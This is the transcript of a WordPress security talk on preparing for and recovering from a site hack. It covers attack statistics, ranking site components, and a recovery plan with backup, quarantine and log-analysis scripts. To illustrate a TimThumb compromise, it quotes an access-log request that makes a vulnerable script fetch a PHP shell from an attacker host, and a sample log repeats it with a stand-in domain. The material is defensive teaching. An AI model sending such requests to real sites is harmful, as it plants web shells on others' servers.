Are you ready to be hacked?

Post on 13-May-2015


This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, assets evaluation and getting help from the right people that know WordPress and care about security.

Transcript of Are you ready to be hacked?

ARE YOU READY TO BE HACKED?

Daniel Kanchev @dvkanchev

May 17th, 2014

WHO AM I?

• 7+ Years of WordPress experience
• 5 Years with SiteGround
• Love FOSS
• Security Freak
• Addicted to extreme sports

Daniel Kanchev

IN THIS SESSION

• Why Should YOU Care

• Assets Evaluation

• Getting Help

• A KISS Disaster Recovery Plan

• Conclusion

WHY MEEEEEEEE ???

IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012!

+700%

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

ATTACKS PER DAY

[Chart: attacks per day. 2010: 190,000; 2012: 464,000; 2013: 570,000]

Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014

ASSETS EVALUATION

MODULAR DESIGN

• Divide your site in logical components

• Allocate weight to all components

• Sort components based on criticality

EXAMPLE TABLE

Component            Weight
WooCommerce plugin   4
Custom theme         3
Gallery plugin       2
Contact form         1

GETTING HELP

IDENTIFY WHO CAN HELP YOU

• The support team of your web host

• Plugin and theme developers

• Third party companies

• Security specialists

THE SUPPORT TEAM OF YOUR WEB HOST

• Website diagnostics

• Website backups and restores

• Log analysis

• WordPress core/plugin/theme upgrades

• Regular Security Audits

• Malware notifications and malicious code cleaning

PLUGIN AND THEME DEVELOPERS/SUPPORT

• New plugin/theme versions

• Security updates

• Migration to new versions of your themes/plugins

DISASTER RECOVERY PLAN

7 "EASY" STEPS

1. DON'T PANIC!

2. Create a copy of the hacked site + all logs

3. Quarantine your site

4. Remove the malicious code

5. Check the archived logs for the source of the attack

6. Resolve the security issues that caused the problem

7. “Unquarantine” your site

1. BACKUP YOUR HACKED SITE

How to backup:

1. mysqldump -uU -pP DB > yoursitefolder/DB.sql
2. tar zcvf backup.tar.gz yoursitefolder

Why to do this:

This is needed so that you can later find out the source of the attack/vulnerability!

USEFUL LOGS (on a cPanel server)

• /var/log/messages - FTP log for PureFTPd
• /usr/local/apache/domlogs/DOMAIN.COM - Apache access log
• /var/log/exim_mainlog - Exim mail server log
• /usr/local/cpanel/logs/access_log - cPanel File Manager log
• /var/log/secure - SSH connections log
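Steps 1 and 2 of the plan (copy the hacked site, the database and all logs) as one script. This is an added example, not from the slides: it assumes the site files live in the first argument, writes the bundle under the second, takes an optional domain as the third argument for the per-domain Apache log, reads the cPanel log paths listed above (overridable via EVIDENCE_LOGS), and only dumps the database when MYSQL_DB, MYSQL_USER and MYSQL_PASS are set.

```shell
#!/bin/sh
# Evidence bundle for "create a copy of the hacked site + all logs".
# Assumed layout (not from the slides): $1 = site directory, $2 = output
# directory, $3 = optional domain for /usr/local/apache/domlogs/$3.
# A listed log that is missing is skipped rather than aborting the copy.
snapshot_hacked_site() {
    site_dir="$1"; out_dir="$2"; domain="${3:-}"
    work="$out_dir/evidence-$(date -u +%Y%m%dT%H%M%SZ)"
    mkdir -p "$work/logs" || return 1

    # Site files: tar keeps modes and mtimes, which later show when files changed
    tar -C "$(dirname "$site_dir")" -czf "$work/site.tar.gz" "$(basename "$site_dir")" || return 1

    # Database, only if configured (--single-transaction avoids locking live tables)
    if [ -n "${MYSQL_DB:-}" ] && command -v mysqldump >/dev/null 2>&1; then
        mysqldump --single-transaction -u"$MYSQL_USER" -p"$MYSQL_PASS" "$MYSQL_DB" \
            > "$work/db.sql" || return 1
    fi

    # System logs from the cPanel list above; cp -p preserves their timestamps
    for f in ${EVIDENCE_LOGS:-/var/log/messages /var/log/secure /var/log/exim_mainlog /usr/local/cpanel/logs/access_log}; do
        [ -r "$f" ] && cp -p "$f" "$work/logs/"
    done
    # Per-domain Apache access log, the file the TimThumb example is read from
    domlog="${DOMLOG_DIR:-/usr/local/apache/domlogs}/$domain"
    [ -n "$domain" ] && [ -r "$domlog" ] && cp -p "$domlog" "$work/logs/$domain.access_log"

    # Hash every file so the copy can later be shown to be untouched
    if command -v sha256sum >/dev/null 2>&1; then hasher=sha256sum; else hasher="shasum -a 256"; fi
    (cd "$work" && find . -type f ! -name SHA256SUMS -exec $hasher {} + > SHA256SUMS) || return 1

    printf '%s\n' "$work"   # bundle path, for the caller
}
```

Run it before touching anything on the server, and keep the bundle off the compromised host once written.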

2. QUARANTINE YOUR SITE + CHANGE PASSWORDS

1. Protect your users and visitors
2. Disallow Google to access your hacked site
3. Keep hackers away during the cleaning of the site

USE .HTACCESS MAGIC

    <IfModule mod_rewrite.c>
        RewriteEngine On
        # Let your own IP through (replace 123.56.89.12 with yours; the
        # trailing $ stops 123.56.89.120-129 from matching as well)
        RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12$
        # Only active while both files exist in the document root
        RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
        RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
        RewriteCond %{SCRIPT_FILENAME} !maintenance.html
        # A non-3xx code in R= drops the substitution and answers 503 directly
        RewriteRule ^.*$ /maintenance.html [R=503,L]
        ErrorDocument 503 /maintenance.html
    </IfModule>
    <IfModule mod_headers.c>
        # "always" is required: plain "Header set" only applies to 2xx responses
        Header always set Retry-After "14400"
        Header always set Cache-Control "max-age=0, no-store"
    </IfModule>

3. REMOVE THE MALICIOUS CODE

1. Restore the site from a clean backup

OR

2. Clean the affected files/database tables

4. ARCHIVED LOGS ANALYSIS

• Is complicated
• Is time consuming
• Requires advanced HTTP knowledge
• Should be performed by security specialists

EXAMPLE - THE TIMTHUMB HACK

189.100.29.167 - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.exl.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"

• 189.100.29.167 - IP of the attacker
• premiumtheme/timthumb.php - vulnerable script
• wp-mails.php - PHP shell script
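A small detection for exactly this pattern, added here and not part of the slides: it scans Apache access log lines for timthumb.php requests whose src= parameter is a remote URL ending in .php (a script fetched through the image resizer instead of an image) and prints the attacker IP, timestamp and fetched URL. The sample log is constructed with documentation IPs and a reserved .example host; it mirrors the slide's request, where the src host starts with blogger.com so it satisfied TimThumb's allowed-domain check while the path is a PHP shell.

```shell
#!/bin/sh
# Reads Apache access log lines on stdin; prints "ip<TAB>timestamp<TAB>src"
# for timthumb.php requests that fetch a remote .php file.
detect_timthumb_abuse() {
    awk '
    /timthumb\.php\?/ {
        split($0, q, "\"")              # q[2] is the quoted request line
        req = q[2]
        if (match(req, /[?&]src=[^ &]+/)) {
            src = substr(req, RSTART + 5, RLENGTH - 5)       # skip "?src="
            gsub(/%3[aA]/, ":", src); gsub(/%2[fF]/, "/", src)  # undo escaped ://
            # A remote src is normal for TimThumb; a .php target is not an image
            if (src ~ /^https?:\/\// && src ~ /\.php([?#].*)?$/) {
                ts = substr($0, index($0, "[") + 1)
                ts = substr(ts, 1, index(ts, "]") - 1)
                printf "%s\t%s\t%s\n", $1, ts, src
            }
        }
    }'
}

# Constructed sample: line 1 is the attack shape from the slide, line 2 a
# legitimate resize of an image, line 3 an unrelated request.
SAMPLE_LOG='198.51.100.23 - - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.attacker.example/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.5 - - [12/Apr/2014:07:01:02 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http%3A%2F%2Fimages.example%2Flogo.jpg&w=100 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Apr/2014:07:05:10 +1000] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"'

# On a cPanel server: detect_timthumb_abuse < /usr/local/apache/domlogs/DOMAIN.COM
printf '%s\n' "$SAMPLE_LOG" | detect_timthumb_abuse
```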

5. RESOLVE THE SECURITY ISSUES

• Upgrade WP core, plugins and themes
• Upgrade server software if needed
• Patch your code and use a WAF in case there are no upgrades available

6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS

• Remove the maintenance page
• Inform users about the breach if needed
• Keep an eye on your files/DB

CONCLUSION

• Web security is complicated!
• Rely on partners to recover your site.
• Be ready to manage the whole process.
• Know your assets.
• Make sure you have good security awareness.
• Security is a journey - NOT a destination!

THANK YOU